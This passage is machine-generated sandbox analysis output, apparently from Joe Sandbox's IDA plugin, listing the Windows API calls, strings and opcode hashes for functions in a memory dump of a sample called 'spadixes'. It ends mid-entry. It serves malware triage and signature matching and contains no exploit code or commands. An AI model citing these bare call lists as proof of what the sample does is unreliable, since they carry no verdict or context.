                                                                                                                                                        • Instruction Fuzzy Hash: 5471E871A00F5BABD714AE7ECC41B6AB7A8FF12768F144229FA10D6681E770D9408BD1
                                                                                                                                                        APIs
                                                                                                                                                        • WSAStartup.WSOCK32(00000101,?), ref: 00918168
                                                                                                                                                        • inet_addr.WSOCK32(?,?,?), ref: 009181AD
                                                                                                                                                        • gethostbyname.WSOCK32(?), ref: 009181B9
                                                                                                                                                        • IcmpCreateFile.IPHLPAPI ref: 009181C7
                                                                                                                                                        • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00918237
                                                                                                                                                        • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 0091824D
                                                                                                                                                        • IcmpCloseHandle.IPHLPAPI(00000000), ref: 009182C2
                                                                                                                                                        • WSACleanup.WSOCK32 ref: 009182C8
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                                                                                        • String ID: Ping
                                                                                                                                                        • API String ID: 1028309954-2246546115
                                                                                                                                                        • Opcode ID: 88636aa68cfdf3398fd3a4b8482b55e6e380927df8ec8716282f83cab726994b
                                                                                                                                                        • Instruction ID: 3bf262df8a78137534397369e877f42d45128ec6ab76e7c950da1fc5cf8b00fd
                                                                                                                                                        • Opcode Fuzzy Hash: 88636aa68cfdf3398fd3a4b8482b55e6e380927df8ec8716282f83cab726994b
                                                                                                                                                        • Instruction Fuzzy Hash: 90518E35604604AFD721AF64CC45F6BBBE8FF49350F048929FA65DB2A1DB34E841EB42
                                                                                                                                                        APIs
                                                                                                                                                        • VariantInit.OLEAUT32(?), ref: 0091B2D5
                                                                                                                                                        • CoInitialize.OLE32(00000000), ref: 0091B302
                                                                                                                                                        • CoUninitialize.OLE32 ref: 0091B30C
                                                                                                                                                        • GetRunningObjectTable.OLE32(00000000,?), ref: 0091B40C
                                                                                                                                                        • SetErrorMode.KERNEL32(00000001,00000029), ref: 0091B539
                                                                                                                                                        • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002), ref: 0091B56D
                                                                                                                                                        • CoGetObject.OLE32(?,00000000,0094D91C,?), ref: 0091B590
                                                                                                                                                        • SetErrorMode.KERNEL32(00000000), ref: 0091B5A3
                                                                                                                                                        • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0091B623
                                                                                                                                                        • VariantClear.OLEAUT32(0094D91C), ref: 0091B633
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2395222682-0
                                                                                                                                                        • Opcode ID: 81adea9f407723bb3638d2f713307351e0ddf67cbef783c7105e8f216a86648c
                                                                                                                                                        • Instruction ID: b02ab3c939fb81629955476ab283714c3db307ca66497f283b5f3ca42c36e3cf
                                                                                                                                                        • Opcode Fuzzy Hash: 81adea9f407723bb3638d2f713307351e0ddf67cbef783c7105e8f216a86648c
                                                                                                                                                        • Instruction Fuzzy Hash: 76C12475608309AFC700DF68C884A6AB7EAFF89308F00495DF58ADB261DB71ED45CB52
                                                                                                                                                        APIs
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00904047
                                                                                                                                                        • GetForegroundWindow.USER32(00000000,?,?,?,?,?,009030A5,?,00000001), ref: 0090405B
                                                                                                                                                        • GetWindowThreadProcessId.USER32(00000000), ref: 00904062
                                                                                                                                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,009030A5,?,00000001), ref: 00904071
                                                                                                                                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 00904083
                                                                                                                                                        • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,009030A5,?,00000001), ref: 0090409C
                                                                                                                                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,009030A5,?,00000001), ref: 009040AE
                                                                                                                                                        • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,009030A5,?,00000001), ref: 009040F3
                                                                                                                                                        • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,009030A5,?,00000001), ref: 00904108
                                                                                                                                                        • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,009030A5,?,00000001), ref: 00904113
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2156557900-0
                                                                                                                                                        • Opcode ID: cb2736dd2eeb6e4cb660cd7940373a3564e359d1f8cbfdfdff0994fb3b5ad26c
                                                                                                                                                        • Instruction ID: 870180b61953a99959c3f28b6e19e82f179e323a30b4ad7277a83efd0a4c8b31
                                                                                                                                                        • Opcode Fuzzy Hash: cb2736dd2eeb6e4cb660cd7940373a3564e359d1f8cbfdfdff0994fb3b5ad26c
                                                                                                                                                        • Instruction Fuzzy Hash: 1E31BFB9518204BFDB20DB54DC85F7977BEABA5711F11C105FE04E62A0CBB4D9809B64
                                                                                                                                                        APIs
                                                                                                                                                        • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 008C30DC
                                                                                                                                                        • CoUninitialize.OLE32(?,00000000), ref: 008C3181
                                                                                                                                                        • UnregisterHotKey.USER32(?), ref: 008C32A9
                                                                                                                                                        • DestroyWindow.USER32(?), ref: 00935079
                                                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 009350F8
                                                                                                                                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00935125
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                                                                                        • String ID: close all
                                                                                                                                                        • API String ID: 469580280-3243417748
                                                                                                                                                        • Opcode ID: 42ab5543f751696211f61cb49b89b61ff52169bc5333f0d89abafd002540aedb
                                                                                                                                                        • Instruction ID: ce447778f5e8f56453ab55c4b365f539c050236e111a4da829d808efbd10218d
                                                                                                                                                        • Opcode Fuzzy Hash: 42ab5543f751696211f61cb49b89b61ff52169bc5333f0d89abafd002540aedb
                                                                                                                                                        • Instruction Fuzzy Hash: 8891F0342006028FC719EB28C895F68F3B8FF19304F5582ADE40AA7262DB31EE56CF45
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 008F9ABF: CLSIDFromProgID.OLE32 ref: 008F9ADC
                                                                                                                                                          • Part of subcall function 008F9ABF: ProgIDFromCLSID.OLE32(?,00000000), ref: 008F9AF7
                                                                                                                                                          • Part of subcall function 008F9ABF: lstrcmpiW.KERNEL32(?,00000000), ref: 008F9B05
                                                                                                                                                          • Part of subcall function 008F9ABF: CoTaskMemFree.OLE32(00000000,?,00000000), ref: 008F9B15
                                                                                                                                                        • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 0091C235
                                                                                                                                                        • _memset.LIBCMT ref: 0091C242
                                                                                                                                                        • _memset.LIBCMT ref: 0091C360
                                                                                                                                                        • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000001), ref: 0091C38C
                                                                                                                                                        • CoTaskMemFree.OLE32(?), ref: 0091C397
                                                                                                                                                        Strings
                                                                                                                                                        • NULL Pointer assignment, xrefs: 0091C3E5
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                                                                                                        • String ID: NULL Pointer assignment
                                                                                                                                                        • API String ID: 1300414916-2785691316
                                                                                                                                                        • Opcode ID: 11eca4cd35fc130691295302cc5e5bbcf05a950c255c19811bcce8a9c4aba0de
                                                                                                                                                        • Instruction ID: dc7ef5df9afdf8969832be4bda71d266e1e65d1458fc813b0ea1019f2ec99c2e
                                                                                                                                                        • Opcode Fuzzy Hash: 11eca4cd35fc130691295302cc5e5bbcf05a950c255c19811bcce8a9c4aba0de
                                                                                                                                                        • Instruction Fuzzy Hash: FA910971E4021CABDB10DFA4DC51EEEBBB9FF04710F10816AE519A7291DB709A45CFA1
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 008DB34E: GetWindowLongW.USER32(?,000000EB), ref: 008DB35F
                                                                                                                                                        • GetSystemMetrics.USER32(0000000F), ref: 0093016D
                                                                                                                                                        • MoveWindow.USER32(00000003,?,00000000,00000001,00000000,00000000,?,?,?), ref: 0093038D
                                                                                                                                                        • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 009303AB
                                                                                                                                                        • InvalidateRect.USER32(?,00000000,00000001,?), ref: 009303D6
                                                                                                                                                        • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 009303FF
                                                                                                                                                        • ShowWindow.USER32(00000003,00000000), ref: 00930421
                                                                                                                                                        • DefDlgProcW.USER32(?,00000005,?,?), ref: 00930440
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Window$MessageSend$InvalidateLongMetricsMoveProcRectShowSystem
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3356174886-0
                                                                                                                                                        • Opcode ID: 9e08fd6a84ea430a8d61550d60fb5d22ac5608e774a6b322e5bf827cbc6d3296
                                                                                                                                                        • Instruction ID: 487f50d104636ea22ab6d195aacafedd3a4aa8ef6555047093e4b58d6b0c45f6
                                                                                                                                                        • Opcode Fuzzy Hash: 9e08fd6a84ea430a8d61550d60fb5d22ac5608e774a6b322e5bf827cbc6d3296
                                                                                                                                                        • Instruction Fuzzy Hash: 94A19D35600616EFDB18CF68C999BBEBBB5BF88700F048115EC59A7290E734AD60DF90
                                                                                                                                                        APIs
                                                                                                                                                        • GetDC.USER32(00000000), ref: 008FE1C0
                                                                                                                                                        • GetDeviceCaps.GDI32(00000000,00000058), ref: 008FE1D1
                                                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 008FE1D8
                                                                                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 008FE1E0
                                                                                                                                                        • MulDiv.KERNEL32(000009EC,?,00000000), ref: 008FE1F7
                                                                                                                                                        • MulDiv.KERNEL32(000009EC,?,?), ref: 008FE209
                                                                                                                                                          • Part of subcall function 008F9AA3: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,008F9A05), ref: 008FA53A
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CapsDevice$ExceptionRaiseRelease
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 603618608-0
                                                                                                                                                        • Opcode ID: 96a1f385a8fed1b583625d7597c31748649f76b4c52ef9cd832dc4b3d2efc4aa
                                                                                                                                                        • Instruction ID: 81e8348433b5d6ea07a534b6280a16c10ebb91b4994008fc6e9b68e9a99e2425
                                                                                                                                                        • Opcode Fuzzy Hash: 96a1f385a8fed1b583625d7597c31748649f76b4c52ef9cd832dc4b3d2efc4aa
                                                                                                                                                        • Instruction Fuzzy Hash: A4018FB9A01618BFEB109BB68C45F5EBFB8EB49751F004066EE04E7290D6709C00CBA0
                                                                                                                                                        APIs
                                                                                                                                                        • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0090027B
                                                                                                                                                        • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 009002B1
                                                                                                                                                        • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 009002C2
                                                                                                                                                        • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00900344
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                                                                                        • String ID: DllGetClassObject
                                                                                                                                                        • API String ID: 753597075-1075368562
                                                                                                                                                        • Opcode ID: 58084427561ac1261798d46f4893e4977a5f6473c1b0a859d242ac6b3e27beb8
                                                                                                                                                        • Instruction ID: cb6e03a78981ce4779ab05d108476475cdb7f57259a349fa90c1495f56293c90
                                                                                                                                                        • Opcode Fuzzy Hash: 58084427561ac1261798d46f4893e4977a5f6473c1b0a859d242ac6b3e27beb8
                                                                                                                                                        • Instruction Fuzzy Hash: 32418E71605204EFDB06CF54C884B9A7BB9EF89314F1480A9ED09DF286D7B5DE44CBA0
                                                                                                                                                        APIs
                                                                                                                                                        • _memset.LIBCMT ref: 00905075
                                                                                                                                                        • GetMenuItemInfoW.USER32 ref: 00905091
                                                                                                                                                        • DeleteMenu.USER32(00000004,00000007,00000000), ref: 009050D7
                                                                                                                                                        • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00981708,00000000), ref: 00905120
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Menu$Delete$InfoItem_memset
                                                                                                                                                        • String ID: 0
                                                                                                                                                        • API String ID: 1173514356-4108050209
                                                                                                                                                        • Opcode ID: b50c523d182be6d763f9f27e59ab12d22f35d1d0070a9c0e8ebef4324deb9822
                                                                                                                                                        • Instruction ID: 3054926edbbddb698c4fa7728bf8f78f272ee113f50848e45ff63f70a0faa879
                                                                                                                                                        • Opcode Fuzzy Hash: b50c523d182be6d763f9f27e59ab12d22f35d1d0070a9c0e8ebef4324deb9822
                                                                                                                                                        • Instruction Fuzzy Hash: DA41AC742097019FD7209F28D881B6BB7E8EF86324F054A1EF9A9972D1D770E900CF62
                                                                                                                                                        APIs
                                                                                                                                                        • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0092E1D5
                                                                                                                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 0092E20D
                                                                                                                                                        • IsDlgButtonChecked.USER32(?,00000001), ref: 0092E248
                                                                                                                                                        • GetWindowLongW.USER32(?,000000EC), ref: 0092E269
                                                                                                                                                        • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0092E281
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MessageSend$ButtonCheckedLongWindow
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3188977179-0
                                                                                                                                                        • Opcode ID: 72f56b282be5f6f74decdc57202153fbcb8a4808e08b86a7f1116c650f7e5ef1
                                                                                                                                                        • Instruction ID: e994823c8bd652907e346f9d8865a43e3d3f7339b03b4b551d1686713b8b1a8d
                                                                                                                                                        • Opcode Fuzzy Hash: 72f56b282be5f6f74decdc57202153fbcb8a4808e08b86a7f1116c650f7e5ef1
                                                                                                                                                        • Instruction Fuzzy Hash: 1261B338A48224AFDB24DF58E8D5FAA77BEEF89300F044069F95997396C770AD51CB10
                                                                                                                                                        APIs
                                                                                                                                                        • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 009112B4
                                                                                                                                                        • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 009112DD
                                                                                                                                                        • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0091131C
                                                                                                                                                          • Part of subcall function 008C936C: __swprintf.LIBCMT ref: 008C93AB
                                                                                                                                                          • Part of subcall function 008C936C: __itow.LIBCMT ref: 008C93DF
                                                                                                                                                        • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00911341
                                                                                                                                                        • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00911349
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1389676194-0
                                                                                                                                                        • Opcode ID: c3d5c59fc768ac43044b51a820255c9dac7a724fca5c4f9ea34fd931eccd9b5b
                                                                                                                                                        • Instruction ID: 9489f57cb405a29b52144c6a8ca249252f89655c2d49af15c3630fb94213c75e
                                                                                                                                                        • Opcode Fuzzy Hash: c3d5c59fc768ac43044b51a820255c9dac7a724fca5c4f9ea34fd931eccd9b5b
                                                                                                                                                        • Instruction Fuzzy Hash: 16411C35A00109EFCB01EF68C985EADBBF5FF49310B148099E95AAB361CB31ED41DB51
                                                                                                                                                        APIs
                                                                                                                                                        • __calloc_crt.LIBCMT ref: 008E21A9
                                                                                                                                                        • CreateThread.KERNEL32(?,?,008E22DF,00000000,?,?), ref: 008E21ED
                                                                                                                                                        • GetLastError.KERNEL32 ref: 008E21F7
                                                                                                                                                        • _free.LIBCMT ref: 008E2200
                                                                                                                                                        • __dosmaperr.LIBCMT ref: 008E220B
                                                                                                                                                          • Part of subcall function 008E7C0E: __getptd_noexit.LIBCMT ref: 008E7C0E
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2664167353-0
                                                                                                                                                        • Opcode ID: 172f1f5138aec97405d49c0f52f05fd4af899f0e0e4a9d5f3ce521c0e2b4931a
                                                                                                                                                        • Instruction ID: 8203bc5fb4e04a760e268ddcf756286945fa2b695002b4d89815c66af49953b6
                                                                                                                                                        • Opcode Fuzzy Hash: 172f1f5138aec97405d49c0f52f05fd4af899f0e0e4a9d5f3ce521c0e2b4931a
                                                                                                                                                        • Instruction Fuzzy Hash: 6D11E5321083C6AFDB11AF6A9C41D6B7B9CFF03774B100529FA14C6181EB71D81196A2
                                                                                                                                                        APIs
                                                                                                                                                        • EndPath.GDI32(?), ref: 008DB0BA
                                                                                                                                                        • StrokeAndFillPath.GDI32(?,?,0093E680,00000000,?,?,?), ref: 008DB0D6
                                                                                                                                                        • SelectObject.GDI32(?,00000000), ref: 008DB0E9
                                                                                                                                                        • DeleteObject.GDI32 ref: 008DB0FC
                                                                                                                                                        • StrokePath.GDI32(?), ref: 008DB117
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
